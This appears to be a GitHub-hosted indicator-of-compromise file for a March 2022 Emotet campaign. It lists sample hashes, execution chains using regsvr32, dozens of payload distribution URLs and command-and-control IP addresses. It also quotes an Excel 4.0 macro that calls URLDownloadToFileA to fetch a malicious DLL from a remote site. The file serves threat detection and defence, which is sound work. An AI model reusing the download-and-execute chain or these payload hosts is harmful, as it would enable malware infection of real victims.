-
Notifications
You must be signed in to change notification settings - Fork 10
/
e5_emotet_31.03.2022.txt
120 lines (96 loc) · 3.5 KB
/
e5_emotet_31.03.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
Emotet 2022 | epoch5 | 31.03.2022 |
************************************************************************************************************
.zip D7892019D6AECFCB5AEE7EA2B634C0B3D331A06183F29B3FE8764AE316B28D81
.xls 51f83bb615894e11bc64c975d619b723cffe7ff4f99448025b3e4da4f3f84db4
.dll 7cdbaea2cd14e415e58f5dbcb2a0865b81a630fa0058339cb19efd6d91652e00
************************************************************************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\so 3103.xlsm
C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Topvzrjhq\nwgkp.pkh"
************************************************************************************************************
.dll distro
https://www.doh-designsection.com/Files/LXZv9wBqLH/
http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/
http://dunyaaslan.com/cgi-bin/IwvOXl/
https://www.centurypapers.com/database-wordpres/VDYOi/
http://fontecmobile.com/pk/tRqU7/
http://dusangerzicgera.com/img/4v7QHP/
https://www.doh-designsection.com/Files/LXZv9wBqLH/
http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/
http://fontecmobile.com/pk/tRqU7/
http://dunyaaslan.com/cgi-bin/IwvOXl/
http://dusangerzicgera.com/img/4v7QHP/
http://www.centurypapers.com/database-wordpres/VDYOi/
************************************************************************************************************
.zip 7006A1D713D4E369C588EEF3F1ED0999DE768FF86F7CC36EDACD45FB29BAA32F
.xls 4883af21678508f6a3e631248a45f711eb168847ff3534a977e57fdc844c4133
.dll ea28624ff2644d6bbafea9df6c5def9bd8a32851edb071dec0b21fb9556958ac
************************************************************************************************************
Exec >>
EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\archivo_3103.xls"
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://fffcatfriends.org/adoptables/XN3HjwHemz1AaIw/", "..\alnu.dll")
C:\Windows\SysWow64\regsvr32.exe -s ..\alnu.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Vnxmfi\ufhamdkh.kkn"
************************************************************************************************************
.dll distro
http://pancook.com/newsite/tbK/
http://fhdllp.com/wp-admin/DWAEc5bkS93/
http://la-csi.com/mt-admin/gCObckGgJyOJWJLZ/
http://hology.ub.ac.id/admin/8haN/
https://fffcatfriends.org/adoptables/XN3HjwHemz1AaIw/
http://filmmogzivota.rs/js/aHOJNRvJFgK4g/
c2's
5.189.160.61:443
94.177.178.26:8080
202.29.239.162:443
54.38.143.246:7080
119.59.125.140:8080
185.148.168.15:8080
188.166.229.148:443
2.58.16.87:8080
104.131.62.48:8080
103.82.248.59:7080
37.59.209.141:8080
103.133.214.242:8080
195.77.239.39:8080
128.199.192.135:8080
78.47.204.80:443
59.148.253.194:443
87.106.97.83:7080
45.71.195.104:8080
85.214.67.203:8080
139.196.72.155:8080
210.57.209.142:8080
194.9.172.107:8080
116.124.128.206:8080
118.98.72.86:443
203.153.216.46:443
202.28.34.99:8080
54.37.228.122:443
202.134.4.210:7080
88.217.172.165:8080
196.44.98.190:8080
195.154.146.35:443
217.182.143.207:443
36.67.23.59:443
207.148.81.119:8080
190.90.233.66:443
66.42.57.149:443
85.25.120.45:8080
93.104.209.107:8080
68.183.93.250:443
103.42.58.120:7080
5.56.132.177:8080
159.69.237.188:443
51.68.141.164:8080
54.37.106.167:8080
198.199.98.78:8080
54.38.242.185:443
62.171.178.147:8080
37.44.244.177:8080
103.41.204.169:8080
78.46.73.125:443
185.148.168.220:8080
191.252.103.16:80
175.126.176.79:8080